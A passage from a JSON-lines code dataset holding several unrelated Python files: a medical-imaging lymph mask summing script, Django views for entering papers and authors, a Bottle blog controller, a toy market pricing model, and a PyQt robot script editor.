sum_lymph = nb.Nifti1Image(zero_arr, sample_img.affine)\n for l in lymph_path:\n print(f'lymph file = {l}')\n lymph_img = nb.load(l)\n lymph_affine = lymph_img.affine\n # print(f'lymph_affine = {lymph_affine}')\n lymph_data = lymph_img.get_fdata()\n # print(f'type sum_lymph = {sum_lymph.shape}, type lymph_img = {lymph_img.shape}')\n # type sum_lymph = (160, 128, 80), type lymph_img = (160, 128, 80)\n sum_lymph += lymph_data\n\n sum_lymph[sum_lymph > 1] = 1\n file_name = 'lymph_cut_sum.nii.gz'\n os.chdir(i)\n if len(lymph_path) != 0:\n nb.Nifti1Image(sum_lymph, lymph_affine).to_filename(file_name)\n print(f'{file_name} saved in {os.getcwd()}')\n else:\n print(f'No lymph node in {os.getcwd()}')\n # break\n\n# WIth SimpleITK\n# for i in folder_path:\n# lymph_path = glob.glob(i + '*lymph_cut.nii.gz')\n# zero_arr = np.zeros((80, 128, 160))\n# sum_lymph = sitk.GetImageFromArray(zero_arr)\n# for l in lymph_path:\n# print(f'lymph file = {l}')\n# lymph_img = sitk.ReadImage(l)\n# lymph_origin = lymph_img.GetOrigin()\n# print(f'lymph_origin = {lymph_origin}')\n# # lymph_img = lymph_img[::-1, :, :]\n# lymph_data = sitk.GetArrayFromImage(lymph_img)\n# print(f'type sum_lymph = {sum_lymph.GetSize()}, type lymph_img = {lymph_img.GetSize()}')\n# sum_lymph += lymph_img\n#\n# sum_lymph[sum_lymph > 1] = 1\n# file_name = 'lymph_cut_sum.nii.gz'\n# os.chdir(i)\n# if len(lymph_path) != 0:\n# sum_lymph_img = sitk.GetImageFromArray(sum_lymph)\n# # sitk.WriteImage(sum_lymph_img[:, :, :], file_name)\n# # sitk.WriteImage(sum_lymph[:, :, :], file_name)\n# print(f'{file_name} saved in {os.getcwd()}')\n# else:\n# print(f'No lymph node in {os.getcwd()}')\n# # break\n# # print(f'lymph path = {i}')\n\n\n# def collect_lymph(lymph_path):\n# patient","repo_name":"hse801/Medical_Segmentation","sub_path":"dataprocessing/sum_lymph.py","file_name":"sum_lymph.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37671005711","text":"import json\nimport re\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import Q\n\nfrom .forms import AuthorForm, PaperStep1Form, AuthorForm2\nfrom .models import Author, Company\nfrom .models import AuthorCompany\nfrom .models import Paper, PaperAuthor\nfrom . import util\nfrom .data import provinces\nfrom .country_map import all_map as country_map\n\n\n# Create your views here.\n\n\ndef add_step1(request):\n if request.method == 'POST':\n form = PaperStep1Form(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n request.session['paper'] = values\n flag = True\n\n if values['pifpub'] == 'true':\n try:\n if re.match(r'^\\s+$', values['pplace']):\n flag = False\n if re.match(r'^\\s+$', values['ppub']):\n flag = False\n if re.match(r'^\\s+$', str(values['pyear'])):\n flag = False\n if re.match(r'^\\s+$', str(values['ppage'])):\n flag = False\n if re.match(r'^\\s+$', values['ppath']):\n flag = False\n except:\n flag = False\n\n if flag:\n return HttpResponseRedirect(reverse('polls:add_step2'))\n else:\n paper = request.session.get('paper', {})\n form = PaperStep1Form(initial={\n 'pname': paper.get('pname', ''),\n 'ptype': paper.get('ptype', ''),\n 'pplace': paper.get('pplace', ''),\n 'ppub': paper.get('ppub', ''),\n 'pyear': paper.get('pyear', ''),\n 'ppage': paper.get('ppage', ''),\n 'ppath': paper.get('ppath', ''),\n })\n return render(request, 'polls/add-step1.html', {'form': form})\n\n\ndef add_step2(request):\n if request.session.get('paper', None) is None:\n raise Http404()\n\n authors = request.session.get('authors', [])\n\n return render(request, 'polls/add-step2.html', {'authors': json.dumps(authors)})\n\n\ndef add_step3(request):\n s = {\"计算机程序[CP]\", \"电子公告[EB]\", \"数据库[DB]\"}\n request.session['paper']['showPath'] = request.session['paper']['ptype'] in s\n return render(request, 'polls/add-step3.html', {\n 'paper': request.session['paper'],\n 'authors': request.session['authors']\n })\n\n\ndef save_paper(request, conti=False):\n _paper = request.session['paper']\n _paper['pifpub'] = (_paper['pifpub'] == 'true')\n authors = request.session['authors']\n if _paper['pyear'] is None:\n _paper['pyear'] = 0\n if _paper['ppage'] is None:\n _paper['ppage'] = 0\n paper = Paper(**_paper)\n paper.save()\n\n for i, a in enumerate(authors):\n author = Author.objects.get(amail=a['amail'])\n company = Company.objects.filter(cnamech1=a['cnamech1'], cnamech2=a['cnamech2'])[0]\n pa = PaperAuthor(\n author=author,\n company=company,\n paper=paper,\n paorder=i+1,\n pacommunication=a.get('isComm', False),\n pacorder=a.get('commOrder', 0)\n )\n pa.save()\n del request.session['paper']\n del request.session['authors']\n if not conti:\n return HttpResponseRedirect(reverse('login:tables'))\n else:\n return HttpResponseRedirect(reverse('polls:add_step1'))\n\n\ndef get_author(request):\n if request.method != 'GET':\n raise Http404()\n name = request.GET.get('name', '')\n if re.match(r'^\\s*$', name):\n return JsonResponse({\n 'success': False,\n 'message': '名字不能为空',\n })\n try:\n author = Author.objects.get(anamech=name)\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': False,\n 'message': '不存在该作者,请添加'\n })\n\n try:\n ac = AuthorCompany.objects.get(author=author)\n return JsonResponse({\n 'success': True,\n 'val': {\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n 'cnamech1': ac.company.cnamech1,\n 'cnamech2': ac.company.cnamech2,\n }\n })\n except ObjectDoesNotExist:\n return JsonResponse({\n 'success': True,\n 'val': {\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n }\n })\n\n\ndef author_list(request):\n if request.method != 'GET':\n raise Http404()\n prefix = request.GET.get('prefix', '')\n if prefix == '':\n raise Http404()\n authors = Author.objects.filter(Q(anamech__startswith=prefix) | Q(anameen__startswith=prefix))[:10]\n result = []\n for author in authors:\n try:\n ac = AuthorCompany.objects.get(author_id=author.aid)\n result.append({\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n 'cnamech1': ac.company.cnamech1,\n 'cnamech2': ac.company.cnamech2,\n 'cnameeg1': ac.company.cnameeg1,\n 'cnameeg2': ac.company.cnameeg2\n })\n except:\n result.append({\n 'anamech': author.anamech,\n 'anameen': author.anameen,\n 'amail': author.amail,\n })\n return HttpResponse(json.dumps(list(result)), content_type=\"application/json\")\n\n\n@csrf_exempt\ndef add_authors(request):\n authors = json.loads(request.body.decode('utf-8'))\n if len(authors) == 0:\n return HttpResponse(json.dumps({'success': False, 'message': '至少添加一位作者'}), content_type=\"application/json\")\n tmp = {}\n for a in authors:\n tmp[a['amail']] = a\n if len(tmp) != len(authors):\n return HttpResponse(json.dumps({'success': False, 'message': '添加了重复的作者'}), content_type=\"application/json\")\n if not util.check_comm(authors):\n return HttpResponse(json.dumps({'success': False, 'message': '通信作者顺序有误'}), content_type=\"application/json\")\n request.session['authors'] = authors\n return HttpResponse(json.dumps({'success': True}), content_type=\"application/json\")\n\n\ndef new_author(request):\n if request.method == 'POST':\n form = AuthorForm(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n try:\n author = Author(\n anamech=values['anamech'],\n anameen=values['anameen'],\n amail=values['amail'],\n )\n author.save()\n except:\n return render(request, 'polls/new-author.html', {\n 'form': form, 'err_msg': '%s已被其他作者占用' % values['amail']})\n\n try:\n company = Company.objects.get(\n cnamech1=values['cnamech1'], cnamech2=values['cnamech2']\n )\n except Company.DoesNotExist:\n company = Company(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameeg1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameeg2'],\n czipcode=values['czipcode'],\n addressch=values['addressch'],\n addressen=values['addressen'],\n )\n company.save()\n ac = AuthorCompany(\n author=author,\n company=company,\n acorder=1,\n accurrent=True,\n )\n ac.save()\n return HttpResponseRedirect(reverse('polls:add_step2'))\n else:\n form = AuthorForm()\n\n return render(request, 'polls/new-author.html', {'form': form})\n\n\ndef new_author_2(request):\n if request.method == 'POST':\n form = AuthorForm2(request.POST)\n if form.is_valid():\n values = form.cleaned_data\n try:\n author = Author(\n anamech=values['alnamech'] + values['afnamech'],\n anameen=values['afnameen'] + ' ' + values['alnameen'],\n alnamech=values['alnamech'],\n afnamech=values['afnamech'],\n alnameen=values['alnameen'],\n afnameen=values['afnameen'],\n amail=values['amail'],\n )\n author.save()\n except:\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': '%s已被其他作者占用' % values['amail']})\n\n if values['country'] == '中国':\n province_no = values['province']\n city_no = values['city']\n area_no = values['area']\n\n if province_no < 0 or province_no >= len(provinces):\n err_msg = '不合法的省份'\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': err_msg})\n province = provinces[province_no]\n\n if city_no < 0 or city_no >= len(province['city']):\n err_msg = '不合法的市'\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': err_msg})\n city = province['city'][city_no]\n\n if area_no < 0 or area_no >= len(city['area']):\n err_msg = '不合法的区县'\n return render(request, 'polls/new-author.html', {\n 'data': values, 'err_msg': err_msg})\n area = city['area'][area_no]\n\n addressch = province['name'] + city['name'] + area + values['addressch']\n try:\n company = Company.objects.get(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameen1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameen2'],\n czipcode=values['czipcode'],\n addressch=addressch,\n )\n except Company.DoesNotExist:\n company = Company(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameen1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameen2'],\n czipcode=values['czipcode'],\n addressch=addressch,\n )\n company.save()\n else:\n addressen = country_map[values['country']] + ' ' + values['addressen']\n try:\n company = Company.objects.get(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameen1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameen2'],\n czipcode=values['czipcode'],\n addressen=addressen,\n )\n except Company.DoesNotExist:\n company = Company(\n cnamech1=values['cnamech1'],\n cnameeg1=values['cnameen1'],\n cnamech2=values['cnamech2'],\n cnameeg2=values['cnameen2'],\n czipcode=values['czipcode'],\n addressen=addressen,\n )\n company.save()\n ac = AuthorCompany(\n author=author,\n company=company,\n acorder=1,\n accurrent=True,\n )\n ac.save()\n\n return HttpResponseRedirect(reverse('polls:add_step2'))\n else:\n return render(request, 'polls/new-author.html', {'data': request.POST, 'err_msg': '信息不完善'})\n return render(request, 'polls/basic-form.html')\n","repo_name":"PoorKing95/worktest","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71850387321","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport bottle\nfrom bottle import route, view, request, abort, error\nfrom lib.pagination import paginate\nfrom models import Category, Post\n\n\nbottle.TEMPLATE_PATH.append('./templates/')\nSTATIC_ROOT = os.path.join(os.path.dirname(__file__), 'public', 'static')\n\ndef add_categories(func):\n \"\"\" Adds category list to each func output \"\"\"\n def wrapper(*args, **kwargs):\n output = func(*args, **kwargs)\n if not isinstance(output, dict):\n return output\n output.update({'categories': Category.objects().all()})\n return output\n return wrapper\n\n\n@route('/')\n@view('index')\n@add_categories\ndef index():\n \"\"\" Index page controller \"\"\"\n paginator = paginate(request, Post.objects().filter_by(is_published=True))\n \n return {'paginator': paginator}\n\n\n@route('/category/:slug#[\\w-]+#')\n@view('category')\n@add_categories\ndef category(slug):\n \"\"\" Category page controller \"\"\"\n category = Category.objects().filter_by(slug=slug).first()\n if not post:\n abort(404)\n paginator = paginate(request, Post.objects().filter_by(is_published=True, \n category_id=category.id))\n\n return {'category': category, 'paginator': paginator}\n\n\n@route('/post/:slug#[\\w-]+#')\n@view('post')\n@add_categories\ndef post(slug):\n \"\"\" Single post controller \"\"\"\n post = Post.objects().filter_by(slug=slug, is_published=True).first()\n if not post:\n abort(404)\n return {'post': post}\n\n\n@error(404)\ndef error404(error):\n \"\"\" Error 404 \"\"\"\n return u'Страница не найдена.'\n","repo_name":"kvex/foobar","sub_path":"foobar.py","file_name":"foobar.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29020971861","text":"import matplotlib.pyplot as plt\nfrom scipy.interpolate import UnivariateSpline\nimport constants\nfrom Product import Product\n\n\nk = 0.1 # Константа изогнутости\n\n\ndef frange(begin, end, step):\n res = []\n current = begin\n while current <= end:\n res.append(current)\n current += step\n return res\n\n\ndef draw_axe(plot, ln):\n plot.plot([i for i in range(ln)], [0 for i in range(ln)])\n plot.vlines(0, ln, 0)\n\n\nclass LocalMarket:\n def __init__(self,\n name: str,\n population: int, # количество семей\n richness: int, # богатство в абстрактных единицах \n dispersy: float,\n product): # неравенство межжду слоями населения\n self.name = name\n self.population = population\n self.richness = richness\n self.dispersy = dispersy\n self.product = product\n\n self._pull = self.product\n # self._generate_population()\n\n def generate_cost(self, quantity, raise_factor):\n B = self.richness * constants.richness_inf\n S = raise_factor\n dis = self.dispersy * 2\n K = dis/self.product.lux\n\n cost = lambda x: (K/((x + K*k - S*0.5) - K*k + B + S*0.5) * self.population * self.product.consumption * self.product.not_panic_time / 50)*self.product.mid_cost\n\n x = [i for i in frange(-0.1, 1000, 0.2)]\n y = [cost(i) for i in frange(-0.1, 1000, 0.2)]\n plt.plot(x, y)\n plt.vlines(quantity, 10, 0)\n plt.show()\n return cost(quantity)\n\n def _generate_population(self):\n # draw_axe(plt, 5)\n # const\n\n draw_axe(plt, 8)\n # params\n lux = 1.0\n dis = 1.0\n S = -0.1\n B = 0.0\n\n # raw calculations\n B = B * constants.richness_inf\n S *= 0.5\n dis *= 2\n K = dis/lux\n x = [i for i in frange(-0.1, 6, 0.2)]\n y = [K/(i + K*k - S*0.5) - K*k + B + S*0.5 for i in x]\n\n # plt.plot(x, y)\n\n spl = UnivariateSpline(x, y)\n spl.set_smoothing_factor(0.1)\n x = [i for i in frange(-0.1, 6, 0.001)]\n\n plt.plot(x, spl(x))\n\n\n # params\n lux = 1.0\n dis = 1.0\n S = 0\n B = 0.0\n t = 2\n\n # raw calculations\n B = B * constants.richness_inf\n S *= 0.5\n dis *= 2\n K = dis/lux\n x = [i for i in frange(-0.1, 6, 0.2)]\n y = [(K/(i + K*k - S) - K*k + B + S)*t for i in x]\n\n # plt.plot(x, y)\n\n spl = UnivariateSpline(x, y)\n spl.set_smoothing_factor(0.1)\n x = [i for i in frange(-0.1, 6, 0.001)]\n\n plt.plot(x, spl(x), color=\"red\")\n plt.show()\n\n\ntovar = Product(\"Картофанчик\", 1, 1, 5.0, 0.1, 8)\nmarket = LocalMarket(\"Мухосранск\", 1500, 50, 0.5, tovar)\n\nprint(market.generate_cost(7500, 50))","repo_name":"Magapie/Economy-model","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12135249906","text":"# -*- coding: utf-8 -*-\r\nimport sys, logging\r\nfrom PyQt5.QtWidgets import QWidget, QFileDialog, QTableWidgetItem\r\nfrom PyQt5.QtCore import QFileInfo, pyqtSlot, pyqtSignal, Qt\r\nfrom ui.frmScriptEditorUi import *\r\nfrom AxRobotData import *\r\n\r\nlogging.basicConfig(stream=sys.stdout)\r\nlog = logging.getLogger(__name__)\r\n\r\n# Sharing data\r\nRunScriptStateDef = {\r\n \"Run\" : 1,\r\n \"Stop\" : 2,\r\n \"Pause\": 3,\r\n}\r\n\r\nclass frmScriptEditor(QWidget, Ui_Form):\r\n sigEventHandler = pyqtSignal(dict)\r\n sigScriptProcess = pyqtSignal(list)\r\n\r\n def __init__(self, MotionCtrl, parent=None):\r\n super(frmScriptEditor, self).__init__(parent)\r\n\r\n # Init object point\r\n self.MotionCtrl = MotionCtrl\r\n self.MotionData = MotionCtrl.MotionData\r\n\r\n # Init normal data\r\n self.CompiledScriptLines = list()\r\n self.lstScriptLines = list()\r\n self.RunScriptState = RunScriptStateDef[\"Stop\"]\r\n self.DefaultSpeed = 0\r\n\r\n # Set logger level\r\n log.setLevel(self.MotionData.GetLogLevel())\r\n\r\n # Init UI components\r\n self.setupUi(self)\r\n self.cboDefaultSpeed.addItems([\"10\",\"50\",\"100\",\"200\",\"300\"])\r\n self.cboDefaultSpeed.setCurrentText(\"100\")\r\n\r\n # Connect signal&slot paire\r\n self.sigEventHandler.connect(self.sltEventHandler)# Establish internal event handling connectoin\r\n self.sigScriptProcess.connect(self.MotionCtrl.sltScriptProcess)# Establish ScriptProcess connection\r\n \"\"\"\r\n self.tblScriptEditor.itemActivated.connect(self.sltTableHandler)\r\n \"\"\"\r\n self.tblScriptEditor.itemClicked.connect(self.sltTableHandler)\r\n# self.tblScriptEditor.itemChanged.connect(self.sltTableHandler)\r\n \"\"\"\r\n self.tblScriptEditor.itemDoubleClicked.connect(self.sltTableHandler)\r\n self.tblScriptEditor.itemPressed.connect(self.sltTableHandler)\r\n self.tblScriptEditor.itemEntered.connect(self.sltTableHandler)\r\n \"\"\"\r\n# self.tblScriptEditor.cellActivated.connect(self.sltCellHandler)\r\n self.tblScriptEditor.cellChanged.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellClicked.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellDoubleClicked.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellEntered.connect(self.sltCellHandler)\r\n# self.tblScriptEditor.cellPressed.connect(self.sltCellHandler)\r\n\r\n self.btnCompile.clicked.connect(self.sltPushButtonHandler)\r\n self.btnRun.clicked.connect(self.sltPushButtonHandler)\r\n self.btnRemoveLine.clicked.connect(self.sltPushButtonHandler)\r\n self.btnClearAll.clicked.connect(self.sltPushButtonHandler)\r\n self.btnLoadScriptFromFile.clicked.connect(self.sltPushButtonHandler)\r\n self.btnSaveScriptToFile.clicked.connect(self.sltPushButtonHandler)\r\n\r\n\r\n # Init ScriptEditor behavior\r\n hdr = self.tblScriptEditor.horizontalHeader()\r\n hdr.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)\r\n self.tblScriptEditor.setShowGrid(False)\r\n self.tblScriptEditor.setSelectionBehavior(self.tblScriptEditor.SelectRows)\r\n \"\"\"\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.NoEditTriggers \\\r\n | self.tblScriptEditor.AnyKeyPressed \\\r\n | self.tblScriptEditor.CurrentChanged \\\r\n | self.tblScriptEditor.DoubleClicked \\\r\n | self.tblScriptEditor.EditKeyPressed \\\r\n | self.tblScriptEditor.SelectedClicked \\\r\n )\r\n \"\"\"\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.AllEditTriggers)\r\n# self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.SingleSelection)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.NoSelection)\r\n\r\n # Init GUI status\r\n self.sigEventHandler.emit({\"ClearAll\":[\"\"]})\r\n\r\n def sltCellHandler(self, r, c):\r\n global RunScriptState\r\n # log.debug(\"cell event @%d/%d, RunScriptState=%s\\r\\n\", r, c, self.RunScriptState)\r\n if self.RunScriptState == RunScriptStateDef[\"Stop\"]:\r\n self.sigEventHandler.emit({\"Uncompiled\":[\"\"]})\r\n\r\n def sltTableHandler(self, item):\r\n global RunScriptStateDef\r\n log.debug(\"table event @%s\\r\\n\", str(item))\r\n if self.RunScriptState == RunScriptStateDef[\"Pause\"]:\r\n self.sigEventHandler.emit({\"Continue\":[\"\"]})\r\n else:\r\n self.sigEventHandler.emit({\"Pause\":[\"\"]})\r\n\r\n # def ItemkeyPressEvent(self, event):\r\n # log.debug(\"Item key press event @%s\\r\\n\", str(event.key()))\r\n\r\n # # Delete selected empty row\r\n # if event.key() == Qt.Key_Backspace:\r\n # row = self.tblScriptEditor.currentRow()\r\n # if row>=0 and self.tblScriptEditor.item(row, 0).text() == \"\":\r\n # self.tblScriptEditor.removeRow(row)\r\n # log.debug(\"Delete selected empty row2 %s\\r\\n\", row)\r\n\r\n # super(QTableWidgetItem, self).keyPressEvent(event)\r\n\r\n def keyPressEvent(self, event):\r\n log.debug(\"key press event @%s\\r\\n\", str(event.key()))\r\n\r\n # Append new row\r\n if event.key() == Qt.Key_Return or event.key() == Qt.Key_Enter:\r\n self.sigEventHandler.emit({\"InsertNewLine\":[\"\"]})\r\n\r\n # Delete selected empty row\r\n elif event.key() == Qt.Key_Backspace:\r\n self.sigEventHandler.emit({\"RemoveSpaceLine\":[\"\"]})\r\n\r\n super(frmScriptEditor, self).keyPressEvent(event)\r\n\r\n def SetGuiStatus(self, event):\r\n if event == \"Run\":\r\n self.btnCompile.setEnabled(False)\r\n self.btnRun.setEnabled(True)\r\n self.btnClearAll.setEnabled(False)\r\n self.btnRemoveLine.setEnabled(False)\r\n self.btnLoadScriptFromFile.setEnabled(False)\r\n self.btnSaveScriptToFile.setEnabled(False)\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.NoEditTriggers)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.NoSelection)\r\n if self.tblScriptEditor.currentItem() != None:\r\n self.tblScriptEditor.currentItem().setSelected(False)\r\n self.btnRun.setText(\"Cancel\")\r\n self.cboDefaultSpeed.setEnabled(False)\r\n elif event == \"Ready\":\r\n self.btnCompile.setEnabled(True)\r\n self.btnRun.setEnabled(True)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(True)\r\n self.tblScriptEditor.setEditTriggers(self.tblScriptEditor.AllEditTriggers)\r\n self.tblScriptEditor.setSelectionMode(self.tblScriptEditor.SingleSelection)\r\n self.btnRun.setText(\"Run\")\r\n self.cboDefaultSpeed.setEnabled(True)\r\n elif event == \"Uncompiled\":\r\n self.btnCompile.setEnabled(True)\r\n self.btnRun.setEnabled(False)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(True)\r\n self.cboDefaultSpeed.setEnabled(True)\r\n elif event == \"ClearAll\":\r\n self.btnCompile.setEnabled(False)\r\n self.btnRun.setEnabled(False)\r\n self.btnClearAll.setEnabled(True)\r\n self.btnRemoveLine.setEnabled(True)\r\n self.btnSaveScriptToFile.setEnabled(False)\r\n self.btnLoadScriptFromFile.setEnabled(True)\r\n self.cboDefaultSpeed.setEnabled(True)\r\n\r\n @pyqtSlot()\r\n def sltPushButtonHandler(self):\r\n btn = self.sender()\r\n if btn.objectName() == \"btnCompile\":\r\n self.sigEventHandler.emit({\"Compile\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnRun\":\r\n if btn.text() == \"Run\":\r\n self.sigEventHandler.emit({\"Run\":[\"\"]})\r\n elif btn.text() == \"Cancel\":\r\n self.sigEventHandler.emit({\"Cancel\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnRemoveLine\":\r\n self.sigEventHandler.emit({\"RemoveSelectedLine\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnClearAll\":\r\n self.sigEventHandler.emit({\"ClearAll\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnLoadScriptFromFile\":\r\n self.sigEventHandler.emit({\"LoadScriptFromFile\":[\"\"]})\r\n\r\n elif btn.objectName() == \"btnSaveScriptToFile\":\r\n self.sigEventHandler.emit({\"SaveScriptToFile\":[\"\"]})\r\n\r\n @pyqtSlot(dict)\r\n def sltEventHandler(self, dctEvents):\r\n global RunScriptStateDef\r\n for k, v in dctEvents.items():\r\n if k != \"SetRowColor\":\r\n log.debug(\"RxEvent:%s, %s\\r\\n\", k, str(v))# For debug only\r\n\r\n if k == \"Compile\":\r\n if self.tblScriptEditor.rowCount() == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Script editor is empty\"]})\r\n else:\r\n self.lstScriptLines = self.ConvertScriptEditorToList()\r\n result, self.CompiledScriptLines, UnRecogLines = self.CompileScript(self.lstScriptLines)\r\n if result < 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Error\",\"Unrecognized commands @lines: {}\".format(UnRecogLines)]})\r\n else:\r\n self.SetGuiStatus(\"Ready\")\r\n\r\n elif k == \"Run\":\r\n if self.tblScriptEditor.rowCount() == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Script editor is empty\"]})\r\n elif len(self.CompiledScriptLines) <= 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Please compile the script before running\"]})\r\n else:\r\n self.RunScriptState = RunScriptStateDef[\"Run\"]\r\n self.SetGuiStatus(k)\r\n # Get default speed setting\r\n self.DefaultSpeed = int(self.cboDefaultSpeed.currentText())\r\n self.sigScriptProcess.emit(self.CompiledScriptLines)\r\n\r\n elif k == \"Ready\" or k == \"Cancel\":\r\n self.RunScriptState = RunScriptStateDef[\"Stop\"]\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"Uncompiled\":\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"Pause\":\r\n self.RunScriptState = RunScriptStateDef[\"Pause\"]\r\n\r\n elif k == \"Continue\":\r\n self.RunScriptState = RunScriptStateDef[\"Run\"]\r\n\r\n elif k == \"ClearAll\":\r\n self.ClearAllRows()\r\n # Clear compiled script\r\n self.CompiledScriptLines.clear()\r\n self.SetGuiStatus(k)\r\n\r\n elif k == \"LoadScriptFromFile\":\r\n # Convert script editor to list form\r\n self.lstScriptLines, Result = self.LoadScriptFromFile()\r\n if Result == 0:\r\n self.ConvertListToScriptEditor(self.lstScriptLines, 1)\r\n self.SetGuiStatus(\"Uncompiled\")\r\n\r\n elif k == \"SaveScriptToFile\":\r\n self.lstScriptLines = self.ConvertScriptEditorToList()\r\n\r\n # Check empty script\r\n if len(self.lstScriptLines) == 0:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\": \\\r\n [\"Warning\",\"Cannot save as empty script file\"]})\r\n # Save to script file\r\n else:\r\n self.SaveScriptToFile(self.lstScriptLines)\r\n\r\n elif k == \"SetRowColor\":\r\n self.tblScriptEditor.item(v[0], 0).setBackground(v[1])\r\n\r\n elif k == \"InsertNewLine\":\r\n self.InsertNewLine()\r\n\r\n elif k == \"RemoveSelectedLine\":\r\n self.RemoveSelectedLine()\r\n\r\n def InsertNewLine(self):\r\n row = self.tblScriptEditor.currentRow()+1\r\n self.tblScriptEditor.insertRow(row)\r\n self.tblScriptEditor.setItem(row, 0, QTableWidgetItem(\"\"))\r\n # self.tblScriptEditor.setCurrentItem(self.tblScriptEditor.item(row,0))\r\n # self.tblScriptEditor.item(row,0).setBackground(QtGui.QColor(222, 225, 227))\r\n self.tblScriptEditor.editItem(self.tblScriptEditor.item(row,0))\r\n log.debug(\"Append new row %s\\r\\n\", row)\r\n\r\n def RemoveSelectedLine(self):\r\n log.debug(\"RemoveSelectedLine: %d\\r\\n\", self.tblScriptEditor.currentRow())\r\n self.tblScriptEditor.removeRow(self.tblScriptEditor.currentRow())\r\n\r\n\r\n def RemoveSpaceLine(self):\r\n row = self.tblScriptEditor.currentRow()\r\n if row>=0 and self.tblScriptEditor.item(row, 0).text() == \"\":\r\n self.tblScriptEditor.removeRow(row)\r\n log.debug(\"RemoveSpaceLine: %d\\r\\n\", row)\r\n\r\n def GetRunScriptState(self):\r\n return RunScriptState\r\n\r\n def ClearAllRows(self):\r\n # Clear all rows\r\n while self.tblScriptEditor.rowCount():\r\n self.tblScriptEditor.removeRow(0)\r\n \r\n # # Reserved one row\r\n # self.tblScriptEditor.insertRow(0)\r\n # self.tblScriptEditor.setItem(0, 0, QTableWidgetItem(\"\"))\r\n\r\n def ConvertListToScriptEditor(self, lstScriptLines, IsOverWrite):\r\n if IsOverWrite:\r\n # Clear all rows\r\n while self.tblScriptEditor.rowCount():\r\n self.tblScriptEditor.removeRow(0)\r\n\r\n # Append rows\r\n row = self.tblScriptEditor.rowCount()\r\n for line in lstScriptLines:\r\n self.tblScriptEditor.insertRow(row)\r\n self.tblScriptEditor.setItem(row, 0, QTableWidgetItem(str(line)))\r\n log.debug(\"ConvertListToScriptEditor: insertRow[%s]: %s\\r\\n\", str(row), line)\r\n row += 1\r\n\r\n def ConvertScriptEditorToList(self):\r\n lstScriptLines = list()\r\n for row in range(self.tblScriptEditor.rowCount()):\r\n lstScriptLines.append(self.tblScriptEditor.item(row,0).text())\r\n log.debug(\"ConvertScriptEditorToList:%s, %d\\r\\n\", str(lstScriptLines), len(lstScriptLines))\r\n return lstScriptLines\r\n\r\n #############################################################\r\n # General format : [strCmd, strParam0, strParam1..strParamN]\r\n # Move joint command : [\"MOVJNT\", \"J1=90\", \"J2=30\", \"J7=80\", \"SPD=100\", \"ACC=100\"]\r\n # Move point command : [\"MOVPT\", \"P1\", \"P3\", \"P2, P1\", \"SPD=100\", \"ACC=100\"]\r\n # Move line command : [\"MOVLN\", \"P1\", \"P2\", \"P3\", \"SPD=100\", \"ACC=100\"]\r\n # Delay command(ms) : [\"DELAY\", \"10\"]\r\n # Loop command(ms) : [\"LOOP\", \"10\"], [\"ENDLOOP\"]\r\n 